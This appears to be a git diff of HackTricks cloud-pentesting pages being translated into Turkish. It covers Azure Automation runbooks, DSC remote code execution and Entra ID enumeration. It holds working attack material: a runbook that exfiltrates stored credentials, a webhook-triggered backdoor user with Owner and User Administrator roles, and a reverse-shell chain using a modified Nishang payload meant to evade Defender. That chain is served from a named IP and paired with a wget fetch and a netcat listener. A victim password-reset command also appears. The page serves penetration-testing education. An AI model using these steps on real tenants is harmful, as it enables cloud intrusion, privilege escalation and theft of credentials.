[From the docs:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automation delivers a cloud-based automation, operating system updates, and configuration service that supports consistent management across your Azure and non-Azure environments. It includes process automation, configuration management, update management, shared capabilities, and heterogeneous features.
[Belgelerden:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automation, Azure ve Azure dışı ortamlarınızda tutarlı yönetimi destekleyen bulut tabanlı bir otomasyon, işletim sistemi güncellemeleri ve yapılandırma hizmeti sunar. Süreç otomasyonu, yapılandırma yönetimi, güncelleme yönetimi, paylaşılan yetenekler ve heterojen özellikler içerir.
These are like "**scheduled tasks**" in Azure that will let you execute things (actions or even scripts) to **manage**, check and configure the **Azure environment**.
Bunlar, **Azure ortamını** **yönetmek**, kontrol etmek ve yapılandırmak için şeyleri (hareketler veya hatta betikler) **çalıştırmanıza** izin veren Azure'daki "**zamanlanmış görevler**" gibidir.
### Run As Account
### Çalıştırma Hesabı
When **Run as Account** is used, it creates an Azure AD **application** with self-signed certificate, creates a **service principal** and assigns the **Contributor** role for the account in the **current subscription** (a lot of privileges).\
Microsoft recommends using a **Managed Identity** for Automation Account.
**Çalıştırma Hesabı** kullanıldığında, kendinden imzalı bir sertifika ile bir Azure AD **uygulaması** oluşturur, bir **hizmet ilkesi** oluşturur ve **mevcut abonelikte** hesap için **Katkıda Bulunan** rolünü atar (birçok ayrıcalık).\
Microsoft, Automation Account için bir **Yönetilen Kimlik** kullanmayı önermektedir.
> [!WARNING]
> This will be **removed on September 30, 2023 and changed for Managed Identities.**
> Bu, **30 Eylül 2023'te kaldırılacak ve Yönetilen Kimlikler için değiştirilecektir.**
## Runbooks & Jobs
## Çalışma Kitapları ve Görevler
**Runbooks** allow you to **execute arbitrary PowerShell** code. This could be **abused by an attacker** to steal the permissions of the **attached principal** (if any).\
In the **code** of **Runbooks** you could also find **sensitive info** (such as creds).
**Çalışma kitapları**, **keyfi PowerShell** kodunu **çalıştırmanıza** olanak tanır. Bu, **ekli ilkenin** (varsa) izinlerini çalmak için bir **saldırgan tarafından kötüye kullanılabilir**.\
**Çalışma kitaplarının** **kodunda** ayrıca **hassas bilgiler** (şifreler gibi) bulabilirsiniz.
If you can **read** the **jobs**, do it as they **contain** the **output** of the run (potential **sensitive info**).
Eğer **görevleri** **okuyabiliyorsanız**, bunu yapın çünkü **çalışmanın** **çıktısını** **içerir** (potansiyel **hassas bilgiler**).
Go to `Automation Accounts` --> `<Select Automation Account>` --> `Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections`
`Otomasyon Hesapları` --> `<Otomasyon Hesabını Seç>` --> `Çalışma Kitapları/Görevler/Hibrit işçi grupları/Gözlemci görevleri/krediler/değişkenler/sertifikalar/bağlantılar` kısmına gidin.
### Hybrid Worker
### Hibrit İşçi
A Runbook can be run in a **container inside Azure** or in a **Hybrid Worker** (non-azure machine).\
The **Log Analytics Agent** is deployed on the VM to register it as a hybrid worker.\
The hybrid worker jobs run as **SYSTEM** on Windows and **nxautomation** account on Linux.\
Each Hybrid Worker is registered in a **Hybrid Worker Group**.
Bir Çalışma Kitabı, **Azure içindeki bir konteynerde** veya bir **Hibrit İşçi** (azure dışı makine) üzerinde çalıştırılabilir.\
**Log Analytics Agent**, onu hibrit işçi olarak kaydetmek için VM'ye dağıtılır.\
Hibrit işçi görevleri, Windows'ta **SYSTEM** ve Linux'ta **nxautomation** hesabı olarak çalışır.\
Her Hibrit İşçi, bir **Hibrit İşçi Grubu** içinde kaydedilir.
Therefore, if you can choose to run a **Runbook** in a **Windows Hybrid Worker**, you will execute **arbitrary commands** inside an external machine as **System** (nice pivot technique).
Bu nedenle, bir **Windows Hibrit İşçi** üzerinde bir **Çalışma Kitabı** çalıştırmayı seçerseniz, **Sistem** olarak bir dış makine içinde **keyfi komutlar** çalıştıracaksınız (güzel bir pivot tekniği).
## Compromise State Configuration (SC)
## Kompromi Durum Yapılandırması (SC)
[From the docs:](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview) Azure Automation **State Configuration** is an Azure configuration management service that allows you to write, manage, and compile PowerShell Desired State Configuration (DSC) [configurations](https://learn.microsoft.com/en-us/powershell/dsc/configurations/configurations) for nodes in any cloud or on-premises datacenter. The service also imports [DSC Resources](https://learn.microsoft.com/en-us/powershell/dsc/resources/resources), and assigns configurations to target nodes, all in the cloud. You can access Azure Automation State Configuration in the Azure portal by selecting **State configuration (DSC)** under **Configuration Management**.
[Belgelerden:](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview) Azure Automation **Durum Yapılandırması**, herhangi bir bulut veya yerel veri merkezindeki düğümler için PowerShell İstenen Durum Yapılandırması (DSC) [yapılandırmalarını](https://learn.microsoft.com/en-us/powershell/dsc/configurations/configurations) yazmanıza, yönetmenize ve derlemenize olanak tanıyan bir Azure yapılandırma yönetim hizmetidir. Hizmet ayrıca [DSC Kaynaklarını](https://learn.microsoft.com/en-us/powershell/dsc/resources/resources) içe aktarır ve yapılandırmaları hedef düğümlere atar, tüm bunlar bulutta gerçekleşir. Azure portalında **Yapılandırma Yönetimi** altında **Durum yapılandırması (DSC)** seçeneğini seçerek Azure Automation Durum Yapılandırmasına erişebilirsiniz.
**Sensitive information** could be found in these configurations.
Bu yapılandırmalarda **hassas bilgiler** bulunabilir.
### RCE
It's possible to abuse SC to run arbitrary scripts in the managed machines.
Yönetilen makinelerde keyfi betikler çalıştırmak için SC'yi kötüye kullanmak mümkündür.
{{#ref}}
az-state-configuration-rce.md
{{#endref}}
## Enumeration
## Sayım
```powershell
# Check user right for automation
az extension add --upgrade -n automation
@@ -80,9 +79,7 @@ Get-AzAutomationAccount | Get-AzAutomationPython3Package
# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>
```
### Create a Runbook
### Bir Runbook Oluşturun
```powershell
# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
@@ -97,9 +94,7 @@ Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <
# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
```
### Exfiltrate Creds & Variables defined in an Automation Account using a Run Book
### Bir Run Book Kullanarak Bir Otomasyon Hesabında Tanımlanan Kimlik Bilgilerini ve Değişkenleri Sızdırma
```powershell
# Change the crdentials & variables names and add as many as you need
@'
@@ -122,61 +117,54 @@ $start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $Au
start-sleep 20
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt
```
> [!NOTE]
> You could do the same thing modifying an existing Run Book, and from the web console.
> Mevcut bir Run Book'u değiştirerek ve web konsolundan aynı şeyi yapabilirsiniz.
### Steps for Setting Up an Automated Highly Privileged User Creation
### Otomatik Yüksek Yetkili Kullanıcı Oluşturma İçin Kurulum Adımları
#### 1. Initialize an Automation Account
#### 1. Bir Otomasyon Hesabı Başlatın
- **Action Required:** Create a new Automation Account.
- **Specific Setting:** Ensure "Create Azure Run As account" is enabled.
- **Gerekli Eylem:** Yeni bir Otomasyon Hesabı oluşturun.
- **Özel Ayar:** "Azure Run As hesabı oluştur" seçeneğinin etkin olduğundan emin olun.
#### 2. Import and Set Up Runbook
#### 2. Runbook'u İçe Aktarın ve Ayarlayın
- **Source:** Download the sample runbook from [MicroBurst GitHub Repository](https://github.com/NetSPI/MicroBurst).
- **Actions Required:**
- Import the runbook into the Automation Account.
- Publish the runbook to make it executable.
- Attach a webhook to the runbook, enabling external triggers.
- **Kaynak:** Örnek runbook'u [MicroBurst GitHub Repository](https://github.com/NetSPI/MicroBurst) adresinden indirin.
- **Gerekli Eylemler:**
- Runbook'u Otomasyon Hesabına içe aktarın.
- Runbook'u çalıştırılabilir hale getirmek için yayınlayın.
- Dış tetikleyicileri etkinleştirmek için runbook'a bir webhook ekleyin.
#### 3. Configure AzureAD Module
#### 3. AzureAD Modülünü Yapılandırın
- **Action Required:** Add the AzureAD module to the Automation Account.
- **Additional Step:** Ensure all Azure Automation Modules are updated to their latest versions.
- **Gerekli Eylem:** AzureAD modülünü Otomasyon Hesabına ekleyin.
- **Ek Adım:** Tüm Azure Otomasyon Modüllerinin en son sürümlerine güncellendiğinden emin olun.
#### 4. Permission Assignment
#### 4. İzin Ataması
- **Roles to Assign:**
- User Administrator
- Subscription Owner
- **Target:** Assign these roles to the Automation Account for necessary privileges.
- **Atanacak Rolleri:**
- Kullanıcı Yöneticisi
- Abonelik Sahibi
- **Hedef:** Bu rolleri gerekli ayrıcalıklar için Otomasyon Hesabına atayın.
#### 5. Awareness of Potential Access Loss
#### 5. Potansiyel Erişim Kaybı Farkındalığı
- **Note:** Be aware that configuring such automation might lead to losing control over the subscription.
- **Not:** Bu tür bir otomasyonu yapılandırmanın abonelik üzerindeki kontrolü kaybetmenize neden olabileceğini unutmayın.
#### 6. Trigger User Creation
- Trigger the webhook to create a new user by sending a POST request.
- Use the PowerShell script provided, ensuring to replace the `$uri` with your actual webhook URL and updating the `$AccountInfo` with the desired username and password.
#### 6. Kullanıcı Oluşturmayı Tetikleyin
- Yeni bir kullanıcı oluşturmak için webhook'u tetikleyin ve bir POST isteği gönderin.
- Sağlanan PowerShell betiğini kullanın, `$uri`'yi gerçek webhook URL'nizle değiştirdiğinizden ve `$AccountInfo`'yu istenen kullanıcı adı ve şifre ile güncellediğinizden emin olun.
```powershell
$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
```
## References
## Referanslar
- [https://learn.microsoft.com/en-us/azure/automation/overview](https://learn.microsoft.com/en-us/azure/automation/overview)
- [https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview)
- [https://github.com/rootsecdev/Azure-Red-Team#runbook-automation](https://github.com/rootsecdev/Azure-Red-Team#runbook-automation)
{{#include ../../../../banners/hacktricks-training.md}}

58
src/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md
View File

@@ -2,68 +2,56 @@
{{#include ../../../../banners/hacktricks-training.md}}
**Check the complete post in:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe)
**Tam gönderiyi kontrol edin:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe)
### Summary of Remote Server (C2) Infrastructure Preparation and Steps
### Uzaktan Sunucu (C2) Altyapı Hazırlığı ve Adımların Özeti
#### Overview
#### Genel Bakış
The process involves setting up a remote server infrastructure to host a modified Nishang `Invoke-PowerShellTcp.ps1` payload, named `RevPS.ps1`, designed to bypass Windows Defender. The payload is served from a Kali Linux machine with IP `40.84.7.74` using a simple Python HTTP server. The operation is executed through several steps:
Bu süreç, Windows Defender'ı atlatmak için tasarlanmış, `RevPS.ps1` adında değiştirilmiş bir Nishang `Invoke-PowerShellTcp.ps1` yükünü barındırmak üzere bir uzaktan sunucu altyapısının kurulmasını içerir. Yük, IP'si `40.84.7.74` olan bir Kali Linux makinesinden basit bir Python HTTP sunucusu kullanılarak sunulmaktadır. İşlem birkaç adımda gerçekleştirilir:
#### Step 1 — Create Files
#### Adım 1 — Dosyaları Oluştur
- **Files Required:** Two PowerShell scripts are needed:
1. `reverse_shell_config.ps1`: A Desired State Configuration (DSC) file that fetches and executes the payload. It is obtainable from [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1).
2. `push_reverse_shell_config.ps1`: A script to publish the configuration to the VM, available at [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1).
- **Customization:** Variables and parameters in these files must be tailored to the user's specific environment, including resource names, file paths, and server/payload identifiers.
- **Gerekli Dosyalar:** İki PowerShell betiğine ihtiyaç vardır:
1. `reverse_shell_config.ps1`: Yükü alıp çalıştıran bir İstenilen Durum Yapılandırması (DSC) dosyasıdır. [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1) adresinden temin edilebilir.
2. `push_reverse_shell_config.ps1`: Yapılandırmayı VM'ye yayınlamak için bir betik, [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1) adresinde mevcuttur.
- **Özelleştirme:** Bu dosyalardaki değişkenler ve parametreler, kullanıcıya özgü ortam için, kaynak adları, dosya yolları ve sunucu/yük tanımlayıcıları dahil olmak üzere, özelleştirilmelidir.
#### Step 2 — Zip Configuration File
- The `reverse_shell_config.ps1` is compressed into a `.zip` file, making it ready for transfer to the Azure Storage Account.
#### Adım 2 — Yapılandırma Dosyasını Ziple
- `reverse_shell_config.ps1` bir `.zip` dosyasına sıkıştırılır, böylece Azure Storage Account'a transfer için hazır hale gelir.
```powershell
Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip
```
#### Adım 3 — Depolama Bağlamını Ayarla ve Yükle
#### Step 3 — Set Storage Context & Upload
- The zipped configuration file is uploaded to a predefined Azure Storage container, azure-pentest, using Azure's Set-AzStorageBlobContent cmdlet.
- Sıkıştırılmış yapılandırma dosyası, Azure'un Set-AzStorageBlobContent cmdlet'ini kullanarak önceden tanımlanmış Azure Depolama konteyneri olan azure-pentest'e yüklenir.
```powershell
Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx
```
#### Adım 4 — Kali Kutusunu Hazırlama
#### Step 4 — Prep Kali Box
- The Kali server downloads the RevPS.ps1 payload from a GitHub repository.
- Kali sunucusu RevPS.ps1 yükünü bir GitHub deposundan indirir.
```bash
wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
```
- Script, hedef Windows VM ve ters shell için port belirtmek üzere düzenlenir.
- The script is edited to specify the target Windows VM and port for the reverse shell.
#### Adım 5 — Yapılandırma Dosyasını Yayınla
#### Step 5 — Publish Configuration File
- Yapılandırma dosyası çalıştırılır ve sonuç olarak ters shell scripti, Windows VM üzerindeki belirtilen konuma dağıtılır.
- The configuration file is executed, resulting in the reverse-shell script being deployed to the specified location on the Windows VM.
#### Step 6 — Host Payload and Setup Listener
- A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to capture incoming connections.
#### Adım 6 — Yükü Barındır ve Dinleyici Kur
- Yükü barındırmak için bir Python SimpleHTTPServer başlatılır ve gelen bağlantıları yakalamak için bir Netcat dinleyicisi kurulur.
```bash
sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443
```
- Zamanlanmış görev, yükü çalıştırarak SYSTEM düzeyinde ayrıcalıklar elde eder.
- The scheduled task executes the payload, achieving SYSTEM-level privileges.
#### Sonuç
#### Conclusion
The successful execution of this process opens numerous possibilities for further actions, such as credential dumping or expanding the attack to multiple VMs. The guide encourages continued learning and creativity in the realm of Azure Automation DSC.
Bu sürecin başarılı bir şekilde yürütülmesi, kimlik bilgisi dökümü veya saldırının birden fazla VM'ye genişletilmesi gibi daha fazla eylem için birçok olasılığı açar. Kılavuz, Azure Automation DSC alanında sürekli öğrenmeyi ve yaratıcılığı teşvik eder.
{{#include ../../../../banners/hacktricks-training.md}}

478
src/pentesting-cloud/azure-security/az-services/az-azuread.md
View File

@@ -2,19 +2,18 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
Azure Active Directory (Azure AD) serves as Microsoft's cloud-based service for identity and access management. It is instrumental in enabling employees to sign in and gain access to resources, both within and beyond the organization, encompassing Microsoft 365, the Azure portal, and a multitude of other SaaS applications. The design of Azure AD focuses on delivering essential identity services, prominently including **authentication, authorization, and user management**.
Azure Active Directory (Azure AD), Microsoft'un kimlik ve erişim yönetimi için bulut tabanlı hizmetidir. Çalışanların, Microsoft 365, Azure portalı ve birçok diğer SaaS uygulaması dahil olmak üzere, hem organizasyon içinde hem de dışında oturum açmalarını ve kaynaklara erişim sağlamalarını mümkün kılar. Azure AD'nin tasarımı, **kimlik doğrulama, yetkilendirme ve kullanıcı yönetimi** gibi temel kimlik hizmetlerini sunmaya odaklanmaktadır.
Key features of Azure AD involve **multi-factor authentication** and **conditional access**, alongside seamless integration with other Microsoft security services. These features significantly elevate the security of user identities and empower organizations to effectively implement and enforce their access policies. As a fundamental component of Microsoft's cloud services ecosystem, Azure AD is pivotal for the cloud-based management of user identities.
Azure AD'nin ana özellikleri arasında **çok faktörlü kimlik doğrulama** ve **koşullu erişim** yer alır; ayrıca diğer Microsoft güvenlik hizmetleriyle sorunsuz entegrasyon sağlar. Bu özellikler, kullanıcı kimliklerinin güvenliğini önemli ölçüde artırır ve organizasyonların erişim politikalarını etkili bir şekilde uygulayıp zorlamalarını sağlar. Microsoft'un bulut hizmetleri ekosisteminin temel bir bileşeni olarak, Azure AD, kullanıcı kimliklerinin bulut tabanlı yönetimi için hayati öneme sahiptir.
## Enumeration
## Sayım
### **Connection**
### **Bağlantı**
{{#tabs }}
{{#tab name="az cli" }}
```bash
az login #This will open the browser (if not use --use-device-code)
az login -u <username> -p <password> #Specify user and password
@@ -43,11 +42,9 @@ az find "vm" # Find vm commands
az vm -h # Get subdomains
az ad user list --query-examples # Get examples
```
{{#endtab }}
{{#tab name="Mg" }}
```powershell
# Login Open browser
Connect-MgGraph
@@ -72,11 +69,9 @@ Connect-MgGraph -AccessToken $secureToken
# Find commands
Find-MgGraphCommand -command *Mg*
```
{{#endtab }}
{{#tab name="Az PowerShell" }}
```powershell
Connect-AzAccount #Open browser
# Using credentials
@@ -98,7 +93,7 @@ Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -Accou
# Connect with Service principal/enterprise app secret
$password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('2923847f-fca2-a420-df10-a01928bec653', $password)
System.Management.Automation.PSCredential('2923847f-fca2-a420-df10-a01928bec653', $password)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant 29sd87e56-a192-a934-bca3-0398471ab4e7d
#All the Azure AD cmdlets have the format *-AzAD*
@@ -106,33 +101,29 @@ Get-Command *azad*
#Cmdlets for other Azure resources have the format *Az*
Get-Command *az*
```
{{#endtab }}
{{#tab name="Raw PS" }}
{{#tab name="Ham PS" }}
```powershell
#Using management
$Token = 'eyJ0eXAi..'
# List subscriptions
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
# Using graph
Invoke-WebRequest -Uri "https://graph.windows.net/myorganization/users?api-version=1.6" -Headers @{Authorization="Bearer {0}" -f $Token}
```
{{#endtab }}
{{#tab name="curl" }}
```bash
# Request tokens to access endpoints
# ARM
@@ -141,11 +132,9 @@ curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-
# Vault
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
```
{{#endtab }}
{{#tab name="Azure AD" }}
```powershell
Connect-AzureAD #Open browser
# Using credentials
@@ -157,57 +146,52 @@ Connect-AzureAD -Credential $creds
## AzureAD cannot request tokens, but can use AADGraph and MSGraph tokens to connect
Connect-AzureAD -AccountId test@corp.onmicrosoft.com -AadAccessToken $token
```
{{#endtab }}
{{#endtabs }}
When you **login** via **CLI** into Azure with any program, you are using an **Azure Application** from a **tenant** that belongs to **Microsoft**. These Applications, like the ones you can create in your account, **have a client id**. You **won't be able to see all of them** in the **allowed applications lists** you can see in the console, **but they are allowed by default**.
Azure'a herhangi bir programla **CLI** üzerinden **giriş yaptığınızda**, **Microsoft**'a ait bir **tenant**'tan bir **Azure Uygulaması** kullanıyorsunuz. Hesabınızda oluşturabileceğiniz uygulamalar gibi, bu Uygulamaların da **bir istemci kimliği** vardır. Konsolda görebileceğiniz **izin verilen uygulama listelerinde** bunların hepsini **göremezsiniz**, **ancak varsayılan olarak izinlidirler**.
For example a **powershell script** that **authenticates** use an app with client id **`1950a258-227b-4e31-a9cf-717495945fc2`**. Even if the app doesn't appear in the console, a sysadmin could **block that application** so users cannot access using tools that connects via that App.
However, there are **other client-ids** of applications that **will allow you to connect to Azure**:
Örneğin, **kimlik doğrulayan** bir **powershell script**'i, istemci kimliği **`1950a258-227b-4e31-a9cf-717495945fc2`** olan bir uygulamayı kullanır. Uygulama konsolda görünmese bile, bir sistem yöneticisi bu uygulamayı **engelleyebilir**, böylece kullanıcılar bu Uygulama aracılığıyla bağlanamaz.
Ancak, **Azure'a bağlanmanıza izin verecek** başka **istemci kimlikleri** olan uygulamalar da vardır:
```powershell
# The important part is the ClientId, which identifies the application to login inside Azure
$token = Invoke-Authorize -Credential $credential `
-ClientId '1dfb5f98-f363-4b0f-b63a-8d20ada1e62d' `
-Scope 'Files.Read.All openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "https://graphtryit-staging.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue
-ClientId '1dfb5f98-f363-4b0f-b63a-8d20ada1e62d' `
-Scope 'Files.Read.All openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "https://graphtryit-staging.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue
$token = Invoke-Authorize -Credential $credential `
-ClientId '65611c08-af8c-46fc-ad20-1888eb1b70d9' `
-Scope 'openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "chrome-extension://imjekgehfljppdblckcmjggcoboemlah" `
-Verbose -Debug `
-InformationAction Continue
-ClientId '65611c08-af8c-46fc-ad20-1888eb1b70d9' `
-Scope 'openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "chrome-extension://imjekgehfljppdblckcmjggcoboemlah" `
-Verbose -Debug `
-InformationAction Continue
$token = Invoke-Authorize -Credential $credential `
-ClientId 'd3ce4cf8-6810-442d-b42e-375e14710095' `
-Scope 'openid' `
-Redirect_Uri "https://graphexplorer.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue
-ClientId 'd3ce4cf8-6810-442d-b42e-375e14710095' `
-Scope 'openid' `
-Redirect_Uri "https://graphexplorer.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue
```
### Tenants
### Kiracılar
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List tenants
az account tenant list
```
{{#endtab }}
{{#endtabs }}
### Users
### Kullanıcılar
For more information about Entra ID users check:
Entra ID kullanıcıları hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-basic-information/
@@ -215,7 +199,6 @@ For more information about Entra ID users check:
{{#tabs }}
{{#tab name="az cli" }}
```bash
# Enumerate users
az ad user list --output table
@@ -245,7 +228,7 @@ az role assignment list --include-inherited --include-groups --include-classic-a
export TOKEN=$(az account get-access-token --resource https://graph.microsoft.com/ --query accessToken -o tsv)
## Get users
curl -X GET "https://graph.microsoft.com/v1.0/users" \
-H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" | jq
-H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" | jq
## Get EntraID roles assigned to an user
curl -X GET "https://graph.microsoft.com/beta/rolemanagement/directory/transitiveRoleAssignments?\$count=true&\$filter=principalId%20eq%20'86b10631-ff01-4e73-a031-29e505565caa'" \
-H "Authorization: Bearer $TOKEN" \
@@ -256,11 +239,9 @@ curl -X GET "https://graph.microsoft.com/beta/roleManagement/directory/roleDefin
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" | jq
```
{{#endtab }}
{{#tab name="Azure AD" }}
```powershell
# Enumerate Users
Get-AzureADUser -All $true
@@ -296,11 +277,9 @@ Get-AzureADUser -ObjectId roygcain@defcorphq.onmicrosoft.com | Get-AzureADUserAp
$userObj = Get-AzureADUser -Filter "UserPrincipalName eq 'bill@example.com'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq $userObj.ObjectId } }
```
{{#endtab }}
{{#tab name="Az PowerShell" }}
```powershell
# Enumerate users
Get-AzADUser
@@ -312,29 +291,26 @@ Get-AzADUser | ?{$_.Displayname -match "admin"}
# Get roles assigned to a user
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
```
{{#endtab }}
{{#endtabs }}
#### Change User Password
#### Kullanıcı Parolasını Değiştir
```powershell
$password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText Force
(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set- AzureADUserPassword -Password $password Verbose
```
### MFA & Conditional Access Policies
It's highly recommended to add MFA to every user, however, some companies won't set it or might set it with a Conditional Access: The user will be **required MFA if** it logs in from an specific location, browser or **some condition**. These policies, if not configured correctly might be prone to **bypasses**. Check:
Her kullanıcıya MFA eklenmesi şiddetle önerilir, ancak bazı şirketler bunu ayarlamayabilir veya belirli bir konum, tarayıcı veya **bazı koşul** ile giriş yapıldığında MFA **gerektirecek** şekilde ayarlayabilir. Bu politikalar, doğru yapılandırılmazsa **bypass** edilmeye yatkın olabilir. Kontrol edin:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
{{#endref}}
### Groups
### Gruplar
For more information about Entra ID groups check:
Entra ID grupları hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-basic-information/
@@ -342,7 +318,6 @@ For more information about Entra ID groups check:
{{#tabs }}
{{#tab name="az cli" }}
```powershell
# Enumerate groups
az ad group list
@@ -369,11 +344,9 @@ az role assignment list --include-groups --include-classic-administrators true -
# To get Entra ID roles assigned check how it's done with users and use a group ID
```
{{#endtab }}
{{#tab name="Azure AD" }}
```powershell
# Enumerate Groups
Get-AzureADGroup -All $true
@@ -399,11 +372,9 @@ Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember
# Get Apps where a group has a role (role not shown)
Get-AzureADGroup -ObjectId <id> | Get-AzureADGroupAppRoleAssignment | fl *
```
{{#endtab }}
{{#tab name="Az PowerShell" }}
```powershell
# Get all groups
Get-AzADGroup
@@ -417,29 +388,26 @@ Get-AzADGroupMember -GroupDisplayName <resource_group_name>
# Get roles of group
Get-AzRoleAssignment -ResourceGroupName <resource_group_name>
```
{{#endtab }}
{{#endtabs }}
#### Add user to group
Owners of the group can add new users to the group
#### Gruppa kullanıcı ekle
Grup sahipleri yeni kullanıcıları gruba ekleyebilir.
```powershell
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
```
> [!WARNING]
> Groups can be dynamic, which basically means that **if a user fulfil certain conditions it will be added to a group**. Of course, if the conditions are based in **attributes** a **user** can **control**, he could abuse this feature to **get inside other groups**.\
> Check how to abuse dynamic groups in the following page:
> Gruplar dinamik olabilir, bu da temelde **bir kullanıcının belirli koşulları yerine getirmesi durumunda bir gruba ekleneceği** anlamına gelir. Elbette, koşullar **bir kullanıcının** **kontrol edebileceği** **özelliklere** dayanıyorsa, bu özelliği **diğer gruplara girmek için** kötüye kullanabilir.\
> Dinamik grupları nasıl kötüye kullanacağınızı aşağıdaki sayfada kontrol edin:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
{{#endref}}
### Service Principals
### Hizmet İlkeleri
For more information about Entra ID service principals check:
Entra ID hizmet ilkeleri hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-basic-information/
@@ -447,7 +415,6 @@ For more information about Entra ID service principals check:
{{#tabs }}
{{#tab name="az cli" }}
```bash
# Get Service Principals
az ad sp list --all
@@ -464,11 +431,9 @@ az ad sp list --show-mine
# Get SPs with generated secret or certificate
az ad sp list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o json
```
{{#endtab }}
{{#tab name="Azure AD" }}
```powershell
# Get Service Principals
Get-AzureADServicePrincipal -All $true
@@ -487,11 +452,9 @@ Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalCreatedO
Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembership |fl *
```
{{#endtab }}
{{#tab name="Az PowerShell" }}
```powershell
# Get SPs
Get-AzADServicePrincipal
@@ -502,155 +465,149 @@ Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
# Get roles of a SP
Get-AzRoleAssignment -ServicePrincipalName <String>
```
{{#endtab }}
{{#tab name="Raw" }}
```powershell
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
```
{{#endtab }}
{{#endtabs }}
> [!WARNING]
> The Owner of a Service Principal can change its password.
